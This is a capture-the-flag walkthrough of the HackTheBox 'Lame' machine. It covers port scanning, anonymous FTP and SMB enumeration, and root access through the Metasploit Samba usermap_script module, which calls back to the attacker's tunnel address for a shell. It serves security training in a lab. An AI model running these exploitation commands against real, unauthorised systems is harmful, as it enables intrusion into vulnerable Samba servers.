Lame
Lame writeup by Thamizhiniyan C S
Overview
Hello everyone, In this writeup we are going to solve Lame from HackTheBox.
Link for the machine : https://app.hackthebox.com/machines/1
Lets Start 🙌
Connect to the HTB server by using the OpenVpn configuration file that’s generated by HTB.
[ Click Here to learn more about how to connect to vpn and access the boxes. ]
After connecting to the vpn service, click on Join Machine to access the machine’s ip.
After joining the machine you can see the IP Address of the target machine.
Reconnaissance
Rustscan
First start the reconnaissance by running rustscan
on the target IP address.
Command: rustscan -a 10.10.10.3 -- -A -Pn
Results
From the results, we got the following ports and services running:
Port | Service | Version |
---|---|---|
21 | FTP | vsftpd 2.3.4 |
22 | SSH | OpenSSH 4.7p1 |
139 | netbios-ssn | Samba smbd 3.X - 4.X |
445 | netbios-ssn | Samba smbd 3.X - 4.X |
3632 | distccd | distccd v1 |
Enumerating FTP
First, I started enumerating the FTP service running on Port 21
.
From the scan results, we can see that the Anonymous login is allowed for FTP.
So I tried to login as Anonymous
Command: ftp 10.10.10.3
username: Anonymous
Password: Anonymous
Found nothing in the FTP anonymous Login.
Enumerating SMB
Next I started to enumerate SMB service running on port 139. I used enum4linux
tool to enumerate.
Command: enum4linux -a 10.10.10.3
From the response of enum4linux
, I didn’t found any interesting shares.
Initial Access
Next, I searched for exploits for the samba version: Samba smbd 3.X - 4.X
and found the this version is vulnerable to command execution.
To use the above exploit, execute the commands in msfconsole
as follows:
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST tun0
( Here tun0 is your hackthebox vpn tunnel IP )
run
Getting the User Flag
Now we have got access to the target machine as root
. I searched for the user flag using the following command:
command: find / -name user.txt
And we have found the user flag.
Getting the Root Flag
Now I searched for the root flag using the same method and found the root flag:
We have successfully found all the flags.
Thank You !!!
Last updated